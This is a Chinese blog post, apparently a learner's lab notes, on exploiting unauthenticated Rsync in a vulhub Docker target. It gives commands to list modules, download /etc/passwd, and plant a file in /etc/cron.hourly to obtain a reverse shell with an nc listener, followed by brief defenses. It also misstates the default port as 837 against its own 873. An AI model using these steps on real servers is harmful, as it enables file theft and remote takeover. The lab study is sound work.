未授权访问:Rsync 未授权访问漏洞

目录

1、漏洞原理

2、环境搭建

3、未授权访问

4、利用rsync下载任意文件

5、利用rsync反弹shell

防御手段


今天继续学习各种未授权访问的知识和相关的实操实验,一共有好多篇,内容主要是参考先知社区的一位大佬的关于未授权访问的好文章,还有其他大佬总结好的文章:

这里附上大佬的好文章链接:常见未授权访问漏洞总结 - 先知社区

我在这只是学习大佬总结好的相关的知识和实操实验,那么废话不多说,开整。

第九篇是关于Rsync的未授权访问

1、漏洞原理

Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。

Rsync 默认允许匿名访问,**如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。**Rsync 的默认端口为 837。

2、环境搭建

#利用DownGit下载https://github.com/vulhub/vulhub/tree/master/rsync/common
DownGit网址:https://minhaskamal.github.io/DownGit/#/home

上传文件到靶机并进行解压

unzip common.zip

编译并启动docker容器

cd common/
docker-compose build && docker-compose up -d

3、未授权访问

rsync rsync://172.16.2.250:873/
rsync rsync://172.16.2.250:873/src

可以看到成功的未授权访问到了Rsync的src问价爱你

4、利用rsync下载任意文件

rsync rsync://172.16.2.250:873/src/etc/passwd ./

5、利用rsync反弹shell

下载crontab配置文件

rsync rsync://172.16.2.250:873/src/etc/crontab ./
复制代码

写入bash并赋权

vim nc
chmod 777

将文件上传至/etc/cron.hourly

rsync -av nc rsync://172.16.2.250:873/src/etc/cron.hourly

本地监听9999

nc -lnvp 9999

等待一会,可以看到反弹成功了。

防御手段

  • -账户认证:正确配置认证用户名及密码。
  • -权限控制:使用合理的权限。
  • -网络访问控制:控制接入源ip。
  • -数据加密传输等

到此Rsync未授权访问漏洞的基础知识也就暂时学习到这里了,后面还有很多的未授权访问知识等着我去学习,我们下次见(*^▽^*)

相关推荐
云飞云共享云桌面42 分钟前
8位机械工程师如何共享一台图形工作站算力?
linux·服务器·网络
hikktn3 小时前
如何在 Rust 中实现内存安全:与 C/C++ 的对比分析
c语言·安全·rust
音徽编程3 小时前
Rust异步运行时框架tokio保姆级教程
开发语言·网络·rust
幺零九零零4 小时前
【C++】socket套接字编程
linux·服务器·网络·c++
23zhgjx-NanKon5 小时前
华为eNSP:QinQ
网络·安全·华为
23zhgjx-NanKon5 小时前
华为eNSP:mux-vlan
网络·安全·华为
点点滴滴的记录5 小时前
RPC核心实现原理
网络·网络协议·rpc
昔我往昔5 小时前
阿里云文本内容安全处理
安全·阿里云·云计算
Lionhacker6 小时前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术
程思扬6 小时前
为什么Uptime+Kuma本地部署与远程使用是网站监控新选择?
linux·服务器·网络·经验分享·后端·网络协议·1024程序员节